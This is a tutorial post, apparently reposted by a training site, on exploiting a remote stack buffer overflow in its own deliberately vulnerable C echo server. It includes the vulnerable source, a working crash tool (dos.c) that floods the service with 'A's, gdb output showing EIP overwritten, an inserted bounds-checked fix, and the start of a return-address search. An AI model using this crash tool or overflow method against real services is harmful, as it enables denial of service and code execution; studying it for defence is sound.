How to write a remote buffer overflow exploit (Beijing Beida Jade Bird Madian Huateng Training)

Posted by admin on 2016-05-19 16:25

Here we assume there is a vulnerable server program (vulnerable.c).

We then write an exploit for that vulnerability, which will give us a remote shell.

1. Understanding the vulnerable program:

--------------------------------- vulnerable.c ---------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BUFFER_SIZE 1024
#define NAME_SIZE 2048

/* Handles one client: asks for a name and greets it. */
int handling(int c)
{
    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    int bytes;

    strcpy(buffer, "My name is: ");
    bytes = send(c, buffer, strlen(buffer), 0);
    if (bytes == -1)
        return -1;

    /* Up to 2048 bytes are read into name ... */
    bytes = recv(c, name, sizeof(name), 0);
    if (bytes == -1)
        return -1;

    name[bytes - 1] = '\0';
    /* ... and sprintf() copies them into buffer, which only holds 1024 bytes:
       this is the overflow the rest of the post is about. */
    sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
    bytes = send(c, buffer, strlen(buffer), 0);
    if (bytes == -1)
        return -1;

    return 0;
}

int main(int argc, char *argv[])
{
    int s, c;
    socklen_t cli_size;
    struct sockaddr_in srv, cli;

    if (argc != 2)
    {
        fprintf(stderr, "usage: %s port\n", argv[0]);
        return 1;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        perror("socket() failed");
        return 2;
    }

    srv.sin_addr.s_addr = INADDR_ANY;
    srv.sin_port = htons((unsigned short int) atol(argv[1]));
    srv.sin_family = AF_INET;

    if (bind(s, (struct sockaddr *) &srv, sizeof(srv)) == -1)
    {
        perror("bind() failed");
        return 3;
    }

    if (listen(s, 3) == -1)
    {
        perror("listen() failed");
        return 4;
    }

    for (;;)
    {
        cli_size = sizeof(cli);
        c = accept(s, (struct sockaddr *) &cli, &cli_size);
        if (c == -1)
        {
            perror("accept() failed");
            return 5;
        }

        printf("client from %s", inet_ntoa(cli.sin_addr));

        if (handling(c) == -1)
            fprintf(stderr, "%s: handling() failed", argv[0]);

        close(c);
    }

    return 0;
}

--------------------------------------------------------------------------------
EOF

Now compile and run the program:

user@linux:~/ > gcc vulnerable.c -o vulnerable
user@linux:~/ > ./vulnerable 8080

This shows that you can run the service on port 8080. Now run it under gdb:

user@linux:~/ > gdb vulnerable
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...
(gdb) run 8080
Starting program: /home/user/directory/vulnerable 8080

The program is now listening on port 8080 and waiting for connections.

user@linux:~/ > telnet localhost 8080
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
My name is: Robin
Hello Robin, nice to meet you!
Connection closed by foreign host.
user@linux:~/ >

There seems to be nothing wrong, but at this point gdb shows on screen:

client from 127.0.0.1 0xbffff28c

(the address differs from machine to machine)

2. Making the vulnerable program overflow its buffer

Reconnect to the service and supply more than 1024 bytes of input at the "My name is:..." prompt:

user@linux:~/ > telnet localhost 8080
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[... well over 1024 'A' characters in total ...]
AAAAAAA

The connection is dropped; let's look at gdb's output:

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

// Don't close gdb!

We can see that eip has been set to 0x41414141. 0x41 is the code for an "A". When our input exceeds 1024 bytes, the program tries to copy the string in name[2048] into buffer[1024]. Because name[2048] is larger than 1024 bytes, name overwrites the buffer and the saved eip stored behind it. Our buffer will look like this:

[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]
[xxxxx buffer-only-1024-bytes xxx] [EIP]

Once the entire return address has been overwritten, the function jumps to the bad address 0x41414141 and a segmentation fault results.
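As an added example (not code from the original post), here is a bounds-checked version of the same handler, showing what closes the overflow described above: build_greeting, handling_safe and greeting_for_as are my own names, and the buffer sizes are the ones vulnerable.c uses.

```c
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#define BUFFER_SIZE 1024
#define NAME_SIZE   2048

/* Bounded replacement for the sprintf() step of handling(): returns the reply
 * length, or -1 if the input is empty or the reply would not fit. snprintf()
 * never writes past out_size, so buffer[] cannot be overrun by a long name. */
int build_greeting(char *out, size_t out_size, const char *name, size_t bytes)
{
    if (bytes == 0 || bytes > NAME_SIZE)
        return -1;                  /* the original wrote name[-1] when bytes == 0 */
    size_t len = bytes - 1;         /* drop the trailing newline, as the original did */
    int n = snprintf(out, out_size, "Hello %.*s, nice to meet you!\r\n", (int) len, name);
    if (n < 0 || (size_t) n >= out_size)
        return -1;                  /* would have been truncated: refuse the request */
    return n;
}

/* Same wire protocol as handling() in vulnerable.c, built on the bounded formatter
 * and sending only the bytes that were actually written. */
int handling_safe(int c)
{
    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    const char prompt[] = "My name is: ";
    if (send(c, prompt, sizeof(prompt) - 1, 0) == -1)
        return -1;
    ssize_t bytes = recv(c, name, sizeof(name), 0);
    if (bytes <= 0)                 /* error, or the peer closed without sending a name */
        return -1;
    int n = build_greeting(buffer, sizeof(buffer), name, (size_t) bytes);
    if (n < 0 || send(c, buffer, (size_t) n, 0) == -1)
        return -1;
    return 0;
}

/* Test hook (constructed input): reply for a name of `count` A's plus '\n', the
 * shape of input dos.c sends, in a static server-sized buffer; NULL if rejected. */
const char *greeting_for_as(size_t count)
{
    static char out[BUFFER_SIZE];
    char name[NAME_SIZE];
    if (count + 1 > sizeof(name))
        return NULL;
    memset(name, 'A', count);
    name[count] = '\n';
    return build_greeting(out, sizeof(out), name, count + 1) < 0 ? NULL : out;
}
```

With a 1024-byte reply buffer, a name of 996 A's is the longest that still fits; anything longer is refused instead of overwriting the stack.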

Now let's write a denial-of-service tool for this program:

------------------------------------ dos.c ------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char **argv)
{
    struct sockaddr_in addr;
    struct hostent *host;
    char buffer[2048];
    int s, i;

    if (argc != 3)
    {
        fprintf(stderr, "usage: %s <host> <port>\n", argv[0]);
        exit(0);
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1)
    {
        perror("socket() failed\n");
        exit(0);
    }

    host = gethostbyname(argv[1]);
    if (host == NULL)
    {
        herror("gethostbyname() failed");
        exit(0);
    }

    addr.sin_addr = *(struct in_addr *) host->h_addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(atol(argv[2]));

    if (connect(s, (struct sockaddr *) &addr, sizeof(addr)) == -1)
    {
        perror("couldn't connect to server\n");
        exit(0);
    }

    /* Nothing clever: fill the buffer with A's and send it, nothing more. */
    for (i = 0; i < 2048; i++)
        buffer[i] = 'A';

    printf("buffer is: %.*s\n", (int) sizeof(buffer), buffer);
    printf("buffer filled... now sending buffer\n");
    send(s, buffer, sizeof(buffer), 0);
    printf("buffer sent.\n");

    close(s);
    return 0;
}

--------------------------------------------------------------------------------
EOF

3. Finding the return address:

Open gdb and look at esp:

(gdb) x/200bx $esp-200
0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff674: 0x41
